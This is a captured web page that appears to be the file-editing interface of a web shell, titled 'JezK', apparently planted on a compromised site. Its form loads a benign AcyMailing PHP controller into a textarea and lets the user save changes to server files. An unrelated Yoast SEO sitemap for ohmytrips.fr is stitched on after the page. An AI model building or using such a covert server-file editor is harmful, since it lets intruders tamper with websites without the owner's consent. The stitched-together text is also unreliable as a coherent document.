
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: BouncesController.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

namespace AcyMailing\Controllers;

use AcyMailing\Core\AcymController;
use AcyMailing\Controllers\Bounces\Listing as BouncesListing;
use AcyMailing\Controllers\Bounces\Rule;
use AcyMailing\Controllers\MailboxActions\Listing as MailboxActionsListing;
use AcyMailing\Controllers\MailboxActions\Edition as MailboxActionsEdition;

class BouncesController extends AcymController
{
    use BouncesListing;
    use Rule;
    use MailboxActionsListing;
    use MailboxActionsEdition;

    private bool $runBounce = false;
    private array $mailboxReport = [];

    public function __construct()
    {
        parent::__construct();

        $this-&gt;defaulttask = 'bounces';
        $this-&gt;breadcrumb[acym_translation('ACYM_MAILBOX_ACTIONS')] = acym_completeLink('bounces');
        $this-&gt;storeRedirectListing();
    }

    public function storeRedirectListing(bool $fromListing = false): void
    {
        $variableName = 'ctrl_mailboxes_stored';
        $taskToStore = [
            '',
            'bounces',
            'mailboxes',
        ];
        $currentTask = acym_getVar('string', 'task', '');
        if (!in_array($currentTask, $taskToStore) &amp;&amp; !$fromListing) {
            return;
        }

        $controller = acym_getVar('RAW', $variableName, null, 'SESSION');
        if ((empty($currentTask) || !in_array($currentTask, $taskToStore)) &amp;&amp; !empty($controller)) {
            $taskToGo = is_array($controller) ? $controller['task'] : $controller;
            $link = acym_completeLink('bounces&amp;task='.$taskToGo, false, true);
            if ($this-&gt;runBounce) {
                $link .= '&amp;runBounce=1';
            }

            acym_redirect($link);
        } else {
            if (empty($currentTask) || !in_array($currentTask, $taskToStore)) {
                $currentTask = 'bounces';
            }
            acym_setSession($variableName, $currentTask);
        }

        $taskToCall = is_array($currentTask) ? $currentTask['task'] : $currentTask;
        if ($fromListing &amp;&amp; method_exists($this, $taskToCall)) {
            $this-&gt;$taskToCall();
        }
    }

    private function getAllParamsRequest(array &amp;$data): void
    {
        $data['search'] = $this-&gt;getVarFiltersListing('string', 'mailboxes_search', '');
        $data['status'] = $this-&gt;getVarFiltersListing('string', 'mailboxes_status', '');
        $data['ordering'] = $this-&gt;getVarFiltersListing('cmd', 'mailboxes_ordering', 'id');
        $data['orderingSortOrder'] = $this-&gt;getVarFiltersListing('cmd', 'mailboxes_ordering_sort_order', 'desc');
    }
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//ohmytrips.fr/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://ohmytrips.fr/post-sitemap.xml</loc>
		<lastmod>2026-09-26T17:32:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ohmytrips.fr/page-sitemap.xml</loc>
		<lastmod>2026-09-25T15:37:18+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ohmytrips.fr/category-sitemap.xml</loc>
		<lastmod>2026-09-26T17:32:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://ohmytrips.fr/author-sitemap.xml</loc>
		<lastmod>2025-10-07T21:23:02+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->